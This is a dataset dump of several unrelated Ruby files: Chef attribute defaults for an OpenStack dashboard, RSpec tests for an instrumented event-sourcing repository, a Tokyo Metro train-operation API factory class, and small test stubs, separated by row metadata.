default['openstack']['dashboard']['wsgi_path'] = node['openstack']['dashboard']['dash_path'] + '/wsgi/django.wsgi'
default['openstack']['dashboard']['wsgi_socket_prefix'] = nil
default['openstack']['dashboard']['session_backend'] = 'signed_cookies'
default['openstack']['dashboard']['ssl_offload'] = false
default['openstack']['dashboard']['plugins'] = nil
default['openstack']['dashboard']['error_log'] = 'openstack-dashboard-error.log'
default['openstack']['dashboard']['access_log'] = 'openstack-dashboard-access.log'
default['openstack']['dashboard']['help_url'] = 'http://docs.openstack.org'
default['openstack']['dashboard']['csrf_cookie_secure'] = true
default['openstack']['dashboard']['session_cookie_secure'] = true
default['openstack']['dashboard']['keystone_multidomain_support'] = false
default['openstack']['dashboard']['identity_api_version'] = 2.0
default['openstack']['dashboard']['keystone_default_domain'] = 'Default'
default['openstack']['dashboard']['console_type'] = 'AUTO'
default['openstack']['dashboard']['keystone_backend']['name'] = 'native'
default['openstack']['dashboard']['keystone_backend']['can_edit_user'] = true
default['openstack']['dashboard']['keystone_backend']['can_edit_group'] = true
default['openstack']['dashboard']['keystone_backend']['can_edit_project'] = true
default['openstack']['dashboard']['keystone_backend']['can_edit_domain'] = true
default['openstack']['dashboard']['keystone_backend']['can_edit_role'] = true
default['openstack']['dashboard']['log_level']['horizon'] = 'INFO'
default['openstack']['dashboard']['log_level']['openstack_dashboard'] = 'INFO'
default['openstack']['dashboard']['log_level']['novaclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['cinderclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['keystoneclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['glanceclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['neutronclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['heatclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['ceilometerclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['troveclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['swiftclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['openstack_auth'] = 'INFO'
default['openstack']['dashboard']['log_level']['nose.plugins.manager'] = 'INFO'
default['openstack']['dashboard']['log_level']['django'] = 'INFO'
default['openstack']['dashboard']['password_autocomplete'] = 'on'
default['openstack']['dashboard']['simple_ip_management'] = false
default['openstack']['dashboard']['neutron']['enable_lb'] = false
default['openstack']['dashboard']['neutron']['enable_quotas'] = true
| 55.057592 | 137 | 0.705972 |
1c3d188a5e85c84ecfb13c49f9af4d6317bec77b | 3,811 | require 'spec_helper'
require 'active_support/notifications'
module AggregateRoot
RSpec.describe InstrumentedRepository do
describe "#load" do
specify "wraps around original implementation" do
repository = instance_double(Repository)
instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
aggregate = Order.new
expect(repository).to receive(:load).with(aggregate, 'SomeStream')
instrumented_repository.load(aggregate, 'SomeStream')
end
specify "instruments" do
repository = instance_double(Repository)
instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
subscribe_to("load.repository.aggregate_root") do |notification_calls|
aggregate = Order.new
expect(repository).to receive(:load).with(aggregate, 'SomeStream')
instrumented_repository.load(aggregate, 'SomeStream')
expect(notification_calls).to eq([{
aggregate: aggregate,
stream: 'SomeStream',
}])
end
end
end
describe "#store" do
specify "wraps around original implementation" do
repository = instance_double(Repository)
instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
aggregate = Order.new
expect(repository).to receive(:store).with(aggregate, 'SomeStream')
instrumented_repository.store(aggregate, 'SomeStream')
end
specify "instruments" do
repository = instance_double(Repository)
instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
subscribe_to("store.repository.aggregate_root") do |notification_calls|
aggregate = Order.new
aggregate.create
aggregate.expire
events = aggregate.unpublished_events.to_a
expect(repository).to receive(:store).with(aggregate, 'SomeStream')
instrumented_repository.store(aggregate, 'SomeStream')
expect(notification_calls).to eq([{
aggregate: aggregate,
version: -1,
stored_events: events,
stream: 'SomeStream',
}])
end
end
end
describe "#with_aggregate" do
specify "instruments both load & store" do
repository = instance_double(Repository)
instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
subscribe_to("load.repository.aggregate_root") do |load_notification_calls|
aggregate = Order.new
subscribe_to("store.repository.aggregate_root") do |store_notification_calls|
events = nil
expect(repository).to receive(:load).with(aggregate, 'SomeStream')
expect(repository).to receive(:store).with(aggregate, 'SomeStream')
instrumented_repository.with_aggregate(aggregate, 'SomeStream') do
aggregate.create
aggregate.expire
events = aggregate.unpublished_events.to_a
end
expect(store_notification_calls).to eq([{
aggregate: aggregate,
version: -1,
stored_events: events,
stream: 'SomeStream',
}])
end
expect(load_notification_calls).to eq([{
aggregate: aggregate,
stream: 'SomeStream',
}])
end
end
end
def subscribe_to(name)
received_payloads = []
callback = ->(_name, _start, _finish, _id, payload) { received_payloads << payload }
ActiveSupport::Notifications.subscribed(callback, name) do
yield received_payloads
end
end
end
end
| 34.963303 | 102 | 0.65206 |
5d97f63073c24b95ab55ac5014c6a7d7acfaedc6 | 845 | # API から取得したハッシュからインスタンスを生成するための Factory Pattern のクラス(メタクラス)
class TokyoMetro::Factory::Generate::Api::TrainOperation::Info < TokyoMetro::Factory::Generate::Api::MetaClass::Info::Fundamental
include ::TokyoMetro::ClassNameLibrary::Api::TrainOperation
# Info クラスに送る変数のリスト
# @return [::Array]
def variables
id = @hash[ "\@id" ]
dc_date = DateTime.parse( @hash[ "dc:date" ] )
valid = DateTime.parse( @hash[ "dct:valid" ] )
operator = @hash[ "odpt:operator" ]
time_of_origin = DateTime.parse( @hash[ "odpt:timeOfOrigin" ] )
railway_line = @hash[ "odpt:railway" ]
info_status = @hash[ "odpt:trainInformationStatus" ]
info_text = @hash[ "odpt:trainInformationText" ].process_train_operation_text
[ id , dc_date , valid , operator , time_of_origin , railway_line , info_status , info_text ]
end
end
| 33.8 | 129 | 0.698225 |
4a751c18fc07e97e2a9702ccb4ef161b96877501 | 109 | require 'spec_helper'
describe Cqslight do
it { expect(Cqslight::Command).to be_instance_of(Module) }
end
| 18.166667 | 60 | 0.770642 |
01d92f8a6c45053b0f963b69979cc22482194378 | 75 | require 'test_helper'
class WritingsHelperTest < ActionView::TestCase
end
| 15 | 47 | 0.826667 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.